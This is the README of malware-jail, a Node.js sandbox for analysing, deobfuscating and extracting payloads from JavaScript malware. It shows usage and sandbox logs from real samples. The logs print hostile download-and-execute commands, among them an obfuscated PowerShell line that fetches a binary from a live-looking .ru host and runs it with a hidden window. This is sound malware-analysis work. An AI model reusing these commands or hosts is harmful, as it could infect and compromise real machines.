HynekPetrak/malware-jail
GitHub: HynekPetrak/malware-jail
A lightweight Node.js-based JavaScript malware sandbox that emulates the WScript and browser environments to execute malicious scripts safely, deobfuscate them automatically and extract their payloads.
Stars: 476 | Forks: 97
# malware-jail
Sandbox for semi-automatic JavaScript malware analysis, deobfuscation and payload extraction. Written for Node.js.
malware-jail is written for [Node's 'vm' sandbox](https://nodejs.org/api/vm.html). It currently implements the
WScript (Windows Scripting Host) context [env/wscript.js](https://github.com/HynekPetrak/malware-jail/blob/master/env/wscript.js), at least the part that malware frequently uses.
The Internet browser context [env/browser.js](https://github.com/HynekPetrak/malware-jail/blob/master/env/browser.js) is partially implemented.
Runs on any operating system. Developed and tested on Linux with Node.js v6.6.0.
Because some ES6 features are used, you need Node.js >= 6.x.
## New features
### Version 0.19
WMI queries are enumerated into a file: [wmis.json](https://github.com/HynekPetrak/malware-jail/blob/master/malware/20161013/out/wmis.json)
### Version 0.17
New parameter added:
```
--t404 - http requests always return HTTP/404 and throws an exception. This enables enumerating of all remote URLs.
```
### Version 0.16
URLs are now saved into urls.json. See the latest [EXAMPLES#malware-of-issue-14](https://github.com/HynekPetrak/malware-jail/blob/master/EXAMPLES.md#malware-of-issue-14).
Various bug fixes and improvements.
### Version 0.14
Various bug fixes and improvements.
### Version 0.13
New parameters added:
```
-t msecs - limits execution time by "msecs" miliseconds, by default 60 seconds.
--h404 - http requests always return HTTP/404 and does not throw an exception. This enables enumerating of all remote URLs.
```
## Installation
You need to install [Node.js](https://nodejs.org) and [npm](https://npmjs.org/).
malware-jail is built on top of [minimist](https://www.npmjs.com/package/minimist), [iconv-lite](https://github.com/ashtuchkin/iconv-lite)
and [entities](https://www.npmjs.com/package/entities).
### Pull from GitHub
Pull the source code with git:
```
git clone https://github.com/HynekPetrak/malware-jail.git
cd malware-jail
```
Then install all dependencies with:
```
npm install
```
### NPM package
Not available yet, coming soon...
## Warning
## Usage
```
bash@linux# node jailme.js -h -b list
7 May 20:54:52 - malware-jail, a malware sandbox ver. 0.19
7 May 20:54:52 - ------------------------
7 May 20:54:52 - Usage: node jailme.js [[-e file1] [-e file2] .. ] [-c ./config.json] \
7 May 20:54:52 - [-o ofile] [-b id] \
7 May 20:54:52 - [-s odir] [--down] [malware1 [malware2] .. ]
7 May 20:54:52 - -c config .. use alternative config file, preceed with ./
7 May 20:54:52 - -e ifile ... js that simulates specific environment
7 May 20:54:52 - -o ofile ... name of the file where sandbox shall be dumped at the end
7 May 20:54:52 - -s odir ... output directory for generated files (malware payload)
7 May 20:54:52 - -b id ... browser type, use -b list for possible values
7 May 20:54:52 - -t msecs ... number of miliseconds before terminating execution, default 1 minute
7 May 20:54:52 - --trace ... print stack trace with every log line
7 May 20:54:52 - --down ... allow downloading malware payloads from remote servers
7 May 20:54:52 - --h404 ... on download return always HTTP/404
7 May 20:54:52 - malware ... js with the malware code
7 May 20:54:52 - If no arguments are specified the default values are taken from config.json
7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]
```
In the examples folder you can find a deactivated malware file. Run the analysis with:
```
node jailme.js -c ./config_wscript_only.json --down=y malware/example.js
```
Internet-browser-based malware can be tested with:
```
node jailme.js -b IE11_W10 malware/example_browser.js
```
At the end of the analysis the complete sandbox context is dumped into the file _'sandbox\_dump\_after.json'_.
You may want to check the following entries in _'sandbox\_dump\_after.json'_:
* _eval\_calls_ - array of the arguments of all eval() calls. Useful when eval() is used for deobfuscation.
* _wscript\_saved\_files_ - content of all files the malware tried to drop. The actual files are also saved into the output/ directory.
* _wscript\_urls_ - all URLs the malware intended to GET or POST to.
* _wscript\_objects_ - WScript or ActiveX objects that were created.
_'sandbox\_dump\_after.json'_ uses [JSONPath](http://goessner.net/articles/JsonPath/) (implemented by [JSON-js/cycle.js](https://github.com/douglascrockford/JSON-js)) to store repeated or cyclic references to the same object.
## Sample output
```
bash@linux# node jailme.js malware/example.js
11 Jan 00:06:24 - Malware sandbox ver. 0.2
11 Jan 00:06:24 - ------------------------
11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
11 Jan 00:06:24 - Malware files: malware/example.js
11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
11 Jan 00:06:24 - Output directory for generated files: output/
11 Jan 00:06:24 - ==> Preparing Sandbox environment.
11 Jan 00:06:24 - => Executing: env/eval.js
11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
11 Jan 00:06:24 - => Executing: env/wscript.js
11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
11 Jan 00:06:24 - ==> Executing malware file(s).
11 Jan 00:06:24 - => Executing: malware/example.js
11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
11 Jan 00:06:24 - Created: WScript.Shell[1]
11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
11 Jan 00:06:24 - Created: ADODB_Stream[3]
11 Jan 00:06:24 - ADODB_Stream[3].Open()
11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%\57020551.dll, 2)
11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%\57020551.dll, DllRegisterServer)
11 Jan 00:06:24 - ADODB_Stream[3].Close()
11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - Generated file saved
11 Jan 00:08:42 - The sandbox context has been saved to: sandbox_dump_after.json
```
In the example above the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf.
## Examples
The [malware](malware) folder contains real malware samples. Most of them were downloaded from https://malwr.com.
For a complete index of the malware samples see [EXAMPLES](EXAMPLES.md).
### Example: analysing Wileen.js
Malicious script obtained from malwr.com: [Wileen.js](https://malwr.com/analysis/NTVkZDQ4MGZkZWE4NDAyM2EwODEyMDM3MDhjMDI1MTQ/)
Apparently the malware does not execute if run in a browser:
```
if (typeof document == "undefined") {
```
Therefore you may want to use the alternative config file that does not load the browser/DOM components:
```
node jailme.js --down=y -c ./config_wscript_only.json malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
```
Interesting use of PowerShell:
```
1 Oct 13:05:34 - => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll)
1 Oct 13:05:34 - Created: WScript.Shell[1]
1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE -ExEc^U^Tio^n^p^oLIC^y^ B^Y^pas^S -NOpro^Fi^L^e^ -^W^InD^Ow^sT^yle^ HI^ddeN^ (^Ne^W^-^OBJ^ecT^ S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s ^'%aPpdata%.eXe', false, undefined)
1 Oct 13:05:34 - ==> Cleaning up sandbox.
1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file.
1 Oct 13:05:34 - The sandbox context has been saved to: sandbox_dump_after.json
```
Log file: [malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out](malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.out)
### Example: analysing ORDER-10455.js
Malicious JavaScript obtained from malwr.com: [ORDER-10455.js](https://malwr.com/analysis/NDU1ZDA4NmY3ZGUyNDczZjg0ODU2OGZiZTMxNjA5NzE/)
First run it without interacting with the remote servers:
```
node jailme.js malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js
```
You get something like:
```
...
29 Sep 23:17:21 - Calling eval() no.: 5
29 Sep 23:17:21 - ActiveXObject(MSXML2.XMLHTTP)
29 Sep 23:17:21 - Created: MSXML2.XMLHTTP[9]
29 Sep 23:17:21 - MSXML2.XMLHTTP[9].open(GET,http://caopdjow.top/user.php?f=0.dat,false)
29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined)
29 Sep 23:17:21 - MSXML2.XMLHTTP[9] Not sending data, if you want to interact with remote server, set --down=y
29 Sep 23:17:21 - MSXML2.XMLHTTP[9].responseBody = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)'
29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status = '200'
29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) finished
29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status.get() => 200
29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
29 Sep 23:17:21 - ActiveXObject(Scripting.FileSystemObject)
29 Sep 23:17:21 - Scripting.FileSystemObject[10] created.
29 Sep 23:17:21 - Scripting.FileSystemObject[10].GetSpecialFolder(2)
29 Sep 23:17:21 - ActiveXObject(ADODB.Stream)
29 Sep 23:17:21 - Created: ADODB_Stream[11]
29 Sep 23:17:21 - ADODB_Stream[11].Open()
29 Sep 23:17:21 - ADODB_Stream[11].Type = '1'
29 Sep 23:17:21 - ADODB_Stream[11].content = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)'
29 Sep 23:17:21 - ADODB_Stream[11].Write(str) - 10000 bytes
29 Sep 23:17:21 - ADODB_Stream[11].size = '10000'
29 Sep 23:17:21 - ADODB_Stream[11].Position = '0'
29 Sep 23:17:21 - ADODB_Stream[11].SaveToFile(Special_Folder__2\w8z05i7y2.exe, 2)
29 Sep 23:17:21 - ADODB_Stream[11].content.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
29 Sep 23:17:21 - ADODB_Stream[11].Close()
29 Sep 23:17:21 - ActiveXObject(WScript.Shell)
29 Sep 23:17:21 - Created: WScript.Shell[12]
29 Sep 23:17:21 - WScript.Shell[12].Run(Special_Folder__2\w8z05i7y2.exe, undefined, undefined)
29 Sep 23:17:21 - Returning: 'undefined'
29 Sep 23:17:21 - ==> Cleaning up sandbox.
29 Sep 23:17:21 - ==> Script execution finished, dumping sandbox environment to a file.
29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
29 Sep 23:17:21 - Saving: output/Special_Folder__2_w8z05i7y2.exe
29 Sep 23:17:21 - Generated file saved
29 Sep 23:17:21 - The sandbox context has been saved to: sandbox_dump_after.json
```
This seems to be the "standard" deobfuscated behaviour: eventually download an exe binary and execute it.
If we want to obtain the real payload, run it with '--down=y':
```
node jailme.js --down=y malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js > malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out
```
Log file: [malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out](malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out)
### Example: analysing Norri.js
Malicious JavaScript obtained from malwr.com: [Norri.js](https://malwr.com/analysis/Mjc0ZjUyMjZhYzg4NDJlYmEwNzBkMTAxODA5NGYwZGM/)
Run:
```
node jailme.js --down=y malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
```
You get:
```
30 Sep 01:02:11 - => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
30 Sep 01:02:11 - Strict mode: false
30 Sep 01:02:11 - Calling eval() no.: 1
30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
30 Sep 01:02:11 - Created: WScript.Shell[9]
30 Sep 01:02:11 - WScript.SpecialFolders(Desktop)
30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk)
30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk)
30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk
30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject)
30 Sep 01:02:11 - Scripting.FileSystemObject[11] created.
30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
30 Sep 01:02:11 - Created: WScript.Shell[12]
30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP)
30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13]
30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream)
30 Sep 01:02:11 - Created: ADODB_Stream[14]
30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/
30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15]
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0)
30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false'
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined)
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200
30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished
30 Sep 01:02:15 - ADODB_Stream[14].type = '1'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:15 - ADODB_Stream[14].Open()
30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)'
30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes
30 Sep 01:02:15 - ADODB_Stream[14].size = '196608'
30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined)
30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:15 - ADODB_Stream[14].Close()
30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined)
30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js)
30 Sep 01:02:15 - ==> Cleaning up sandbox.
30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file.
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15]
30 Sep 01:02:16 - Generated file saved
30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json
```
The behaviour is clear from the log. The payload has been extracted into the file output/TemporaryFolder_TempFile[15].
Log file: [malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out](malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out)
### Example: analysing Angler EK
Angler EK was downloaded and extracted from the pcap at [ANGLER EK SENDS CRYPTOWALL](http://www.malware-traffic-analysis.net/2015/12/21/index.html) into [malware/angler/angler_full.html](malware/angler/angler_full.html).
The non-Angler parts were stripped and the result saved as [malware/angler/angler_stripped.html](malware/angler/angler_stripped.html).
Remove `